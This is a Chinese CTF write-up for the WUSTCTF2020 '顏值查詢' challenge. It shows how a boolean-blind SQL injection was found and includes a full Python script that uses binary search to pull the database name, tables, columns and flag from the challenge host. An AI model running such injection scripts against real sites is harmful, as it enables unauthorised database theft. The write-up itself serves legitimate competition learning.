WUSTCTF2020 顏值查詢-有解無憂

題型分析：emm，這是一道SQL注入的題（一看到查詢，就明白了）

首先，嘗試一下頁面（還是bootstrap寫的呢，老搬磚了），

在這里插入圖片描述

emm，感覺是個數字型別的注入，嘗試了好多次，發現沒有錯誤回顯，emm聯合注入也出現了問題，在嘗試的程序中，發現可能存在布爾盲注的可能

于是，嘗試一下

0^1

在這里插入圖片描述

0^0

在這里插入圖片描述

兩種不同的情況，于是開始布爾盲注，幸好，出題大大善良，并沒有過濾什么，于是開始腳本撰寫

import requests
import time

host = "http://b9e40acf-6866-4745-8b92-68ae03a88d82.node4.buuoj.cn:81/index.php"


# true:3640
# false:3638
# database=ctf
def getdatabase():
	database_name = ""
	for x in range(1, 1000):
		low = 32
		height = 127
		mid = (low + height) // 2
		while low < height:
			params = {
				"stunum": "0^(ascii(mid(database()," + str(x) + ",1))>" + str(mid) + ")"
			}
			r = requests.get(url=host, params=params)
			if len(r.text) == 3640:
				low = mid + 1
			else:
				height = mid
			mid = (low + height) // 2
		if low <= 32 or height >= 127:
			break
		database_name += chr(mid)
		print("資料庫為:", database_name)


# payload:0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),"+str(x)+",1))>"+str(mid)+")
# table:flag,score
def gettable():
	table_name = ""
	for x in range(1, 1000):
		low = 32
		height = 127
		mid = (low + height) // 2
		while low < height:
			params = {
				"stunum": "0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf'))," + str(
					x) + ",1))>" + str(mid) + ")"
			}
			r = requests.get(url=host, params=params)
			if len(r.text) == 3640:
				low = mid + 1
			else:
				height = mid
			mid = (low + height) // 2
		if low <= 32 or height >= 127:
			break
		table_name += chr(mid)
		print("表名為:", table_name)
		time.sleep(1)


#column:flag,value
def getcolumn():
	column_name = ""
	for x in range(1, 1000):
		low = 32
		height = 127
		mid = (low + height) // 2
		while low < height:
			params = {
				"stunum": "0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))," + str(x) + ",1))>" + str(mid) + ")"
			}
			r = requests.get(url=host, params=params)
			if len(r.text) == 3640:
				low = mid + 1
			else:
				height = mid
			mid = (low + height) // 2
		if low <= 32 or height >= 127:
			break
		column_name += chr(mid)
		print("欄位名為:", column_name)
		time.sleep(1)

def getflag():
	flag = ""
	for x in range(1, 1000):
		low = 32
		height = 127
		mid = (low + height) // 2
		while low < height:
			params = {
				"stunum": "0^(ord(substr((select(group_concat(value))from(flag))," + str(x) + ",1))>" + str(mid) + ")"
			}
			r = requests.get(url=host, params=params)
			if len(r.text) == 3640:
				low = mid + 1
			else:
				height = mid
			mid = (low + height) // 2
		if low <= 32 or height >= 127:
			break
		flag += chr(mid)
		print("flag為:", flag)
		time.sleep(1)



getdatabase()
gettable()
getcolumn()
getflag()

由于頁面回傳字符太多，于是在判斷方法上我選用了判別回傳長度的方式，篩選程序又使用了二分法（二分法yyds），比暴力快了很多
其中資料庫可以不用查詢的，在查table_name的時候，填資料庫直接寫database()也是可以的

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/356046.html

標籤：其他

上一篇：Windows系統 services.msc命令詳解，Windows命令列查看本地服務

下一篇：【內網滲透工具】炫彩蛇安裝教程